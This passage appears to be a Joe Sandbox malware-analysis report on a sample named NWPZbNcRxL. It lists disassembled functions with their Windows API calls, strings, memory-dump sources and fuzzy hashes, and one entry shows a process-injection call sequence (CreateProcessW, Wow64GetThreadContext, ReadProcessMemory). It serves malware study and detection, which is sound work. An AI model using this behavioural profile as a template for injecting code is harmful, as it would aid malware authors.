OleInitialize.OLE32(00000000), ref: 00C1FA4A
CloseHandle.KERNEL32(00000000), ref: 00C545C8

Strings

, xrefs: 00C1F914

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-3162483948
Opcode ID: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
Instruction ID: 0f8b2d28b3eedc9ed113f58b404fd58c70c84a0b9f1bd09725bd2b41156cf6ab
Opcode Fuzzy Hash: cdcf89053db44e91782c63409588f464c055304dfc6184410db41701d8511e8b
Instruction Fuzzy Hash: 3A819AB0916A40CFC784EF39A94476D7BE5FB893067A0812FE519CB372EB7044859F12

Function 00C135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C135A1,SwapMouseButtons,00000004,?), ref: 00C135D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C135F5
RegCloseKey.KERNELBASE(00000000,?,?,00C135A1,SwapMouseButtons,00000004,?,?,?,?,00C12754), ref: 00C13617

Strings

Control Panel\Mouse, xrefs: 00C135D2

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
Instruction ID: a444fbc3dfb96eaceb32aa03146ce8bd1bf613cef9e77ac8ba2ee4dfed470285
Opcode Fuzzy Hash: f890b1122df5699a98e7d1a85d2b11ab3c1657eb2a27263666fa1793a4730f4a
Instruction Fuzzy Hash: BB114871610248BFDB208F64DC84AEEB7BCFF46744F00546AF805D7210D2719F95A764

Function 01026280 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01026A3B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01026AD1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01026AF3

Memory Dump Source

Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 5e0f740a0ecf3d165e9da069972e5195092361a7a40632f111179b2b2bd8e352
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 42621C30A14258DBEB24DFA4C850BDEB776EF58300F1091A9D60DEB390E7769E81CB59

Function 00C7955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD

Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837

_free.LIBCMT ref: 00C796A2
_free.LIBCMT ref: 00C796A9
_free.LIBCMT ref: 00C79714

Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B

_free.LIBCMT ref: 00C7971C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
Instruction ID: 6950fa332f7878e6f8454ecbaa8a1a74a0ab403e10867f331b336501d4ade745
Opcode Fuzzy Hash: 50af52b8f22919c11c7515362fb071ee60fc7e1c9e9e4129b0e36dbf2dd802cb
Instruction Fuzzy Hash: 31515DB1D14258AFDF289FA4CC81A9EBBB9EF49300F10449EF20DA7241DB715A81DF58

Function 00C3470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C347A0
__flush.LIBCMT ref: 00C347C0
__write.LIBCMT ref: 00C347F3
__flsbuf.LIBCMT ref: 00C34821

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 8d4230ffa43e9d35eaa8f8f916f52f0689dbb570e421e30056e0c75bf4f2d3c7
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 5B41C475A207469BDB1CCE69C8809AE77A6EF42364F24817DE825C7680DB70FE81CB41

Function 00C17285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4EA39
GetOpenFileNameW.COMDLG32(?), ref: 00C4EA83

Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770

Part of subcall function 00C30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0

Strings

X, xrefs: 00C4EA51

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
Instruction ID: 32ccd430b80dd8d0bf1d0c6959e219a42709e5a7c1eaf85a107bdb017564202b
Opcode Fuzzy Hash: 6083d0bcdb5ac321cdd1a67073800b466e845b3754bfc26050b3e7317f85daf6
Instruction Fuzzy Hash: 5E21D271A142589BCF01DF94C845BEEBBF8AF49714F00401AE808AB281DBB4598DEFA1

Function 00C78D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C78DAC
__fread_nolock.LIBCMT ref: 00C78DC1

Strings

EA06, xrefs: 00C78DF3

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f607b9b85861bb8907be42858c75c1d3eb3bbff1f689c318f20aaa553201a8e4
Instruction ID: f2d69e19110ccdf925c653cb8e4716c1782aa7fcad23842436c8c1d4cf4ecfc6
Opcode Fuzzy Hash: f607b9b85861bb8907be42858c75c1d3eb3bbff1f689c318f20aaa553201a8e4
Instruction Fuzzy Hash: E701F9729042187EDB28CAA8C816EEE7BF8DB11301F00419EF556D2181E874E6089B60

Function 00C798E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C798F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C7990F

Strings

aut, xrefs: 00C79909

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
Instruction ID: 2439ba7f557471a172c37ba3e288a2d45e396fe10efc2303e5495cf4e5b6f3d0
Opcode Fuzzy Hash: 4a063300a5f4a6efda9f160094f9c04f6cbff5bce02b49de7158d7362e8a89d8
Instruction Fuzzy Hash: C6D05E7954030DABDB509BA0DC0EF9B773CE704700F0002B6BA94D10A1EAB095998B91

Function 00C8CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
Instruction ID: 589d0ab17de26f11be9e4abfc4cf05a6fa27608ba9161e69cd04ad99b3338b38
Opcode Fuzzy Hash: 817160fb11a9447205f010748b228795b1faa90cc83a6f3dfdf6784ce9b59523
Instruction Fuzzy Hash: 2BF14B716083419FC714EF28C484A6ABBE5FF89318F14892EF9999B351D730E945CF92

Function 00C1434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C14370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C14432

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
Instruction ID: 38982c91bd16b678f2787cb5395f5222340a892a1f07a4f73a10dca61d62a9ed
Opcode Fuzzy Hash: 8ecbddad9946978e68382ff40ba3e05109a44cdd734d38b798259d4ea4212df3
Instruction Fuzzy Hash: DB316FB05057019FD725DF24D8847DBBBF8FB49309F00092EF5AAC2251E771AA88DB52

Function 00C3571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C35733

Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A192
Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A19C

__NMSG_WRITE.LIBCMT ref: 00C3573A

Part of subcall function 00C3A1C8: GetModuleFileNameW.KERNEL32(00000000,00CD33BA,00000104,?,00000001,00000000), ref: 00C3A25A
Part of subcall function 00C3A1C8: ___crtMessageBoxW.LIBCMT ref: 00C3A308

Part of subcall function 00C3309F: ___crtCorExitProcess.LIBCMT ref: 00C330A5
Part of subcall function 00C3309F: ExitProcess.KERNEL32 ref: 00C330AE

Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28

RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
Instruction ID: f7bbf1e3de705a91ac110aba160e4e12deb66471a63e3cd3f7190bd0755cb05b
Opcode Fuzzy Hash: 7fb8641d0046934611834dfc22349457397cc0b1595c6c8c436bc981e2a7c5cd
Instruction Fuzzy Hash: 8D01D475271B42DBD6113739EC86B2E73889F83762F10053AF815EB1E2DEB09E016A61

Function 00C798A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C79548,?,?,?,?,?,00000004), ref: 00C798BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C798D1
CloseHandle.KERNEL32(00000000,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C798D8

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
Instruction ID: c6511e26d66413eac8e88f0dc0515691432723c2121723d1aaee7c11e8d0a832
Opcode Fuzzy Hash: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
Instruction Fuzzy Hash: 9CE08632140214B7EB211B64EC0EFDE7B19EB06760F108125FB24A90F087B1562297D8

Function 00C78D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C78D1B

Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B

_free.LIBCMT ref: 00C78D2C
_free.LIBCMT ref: 00C78D3E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
Instruction ID: c633dbf315a95d57c0d43ffc37f79d539e478ce928b7708461c737af82590984
Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
Instruction Fuzzy Hash: 9CE012B165160246CF34A678AD48A9313DC4F68352B24491DB62DD7186DF64F946D124

Function 00C1A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C4FC01

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 106c30d4c21290c277eaf453964886d9854392eddf2838e08d3152bfc969c27b
Instruction ID: 12685adb9c783136b3a7e84846a99a60ef1b58e02ab48d23f91a37738fe2de23
Opcode Fuzzy Hash: 106c30d4c21290c277eaf453964886d9854392eddf2838e08d3152bfc969c27b
Instruction Fuzzy Hash: C6224974509201DFC724DF14C494BAABBE1FF86314F14896DE89A8B361D731ED85EB82

Function 00C14C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C14CBA

Strings

EA06, xrefs: 00C4D8CC

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: ffe41f50ca0e583bd70c3fa576de6be4348e3ce45ae3e475abdc25da81580c27
Instruction ID: 9437a3ad685653456a2aacd7b9f928fd3cf1713ff8512d5ad18d5ee36132186c
Opcode Fuzzy Hash: ffe41f50ca0e583bd70c3fa576de6be4348e3ce45ae3e475abdc25da81580c27
Instruction Fuzzy Hash: B6414F71A0415857DF196B64E861BFE7FA29F47300F684475EC829B282D6309EC5B3A1

Function 00C15C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00C15821,?,?,?,?), ref: 00C15CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00C15821,?,?,?,?), ref: 00C4DD73

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d565e1e1dceb94d038a1b099acd72657fc0c0181fbc9dd5a72f31c1767279cb0
Instruction ID: 21c49de08ede2626c8e94acfcbfd8d60fd175d2d60b491c1ca78ec4442e28888
Opcode Fuzzy Hash: d565e1e1dceb94d038a1b099acd72657fc0c0181fbc9dd5a72f31c1767279cb0
Instruction Fuzzy Hash: E4019670244748FEF7201E24CC9AFB637DCEB05768F208319BBE59A1E0C6B41D859B94

Function 00C30DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F

std::exception::exception.LIBCMT ref: 00C30DEC
__CxxThrowException@8.LIBCMT ref: 00C30E01

Part of subcall function 00C3859B: RaiseException.KERNEL32(?,?,?,00CC9E78,00000000,?,?,?,?,00C30E06,?,00CC9E78,?,00000001), ref: 00C385F0

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 611954518ee0d7573e844122a34ff9e81b0b14d1b6ef8847872171139d23112c
Instruction ID: 58913e5cdad045ee2690a6c7b28b59a44554e83ceaaf1812a037b95aeee50770
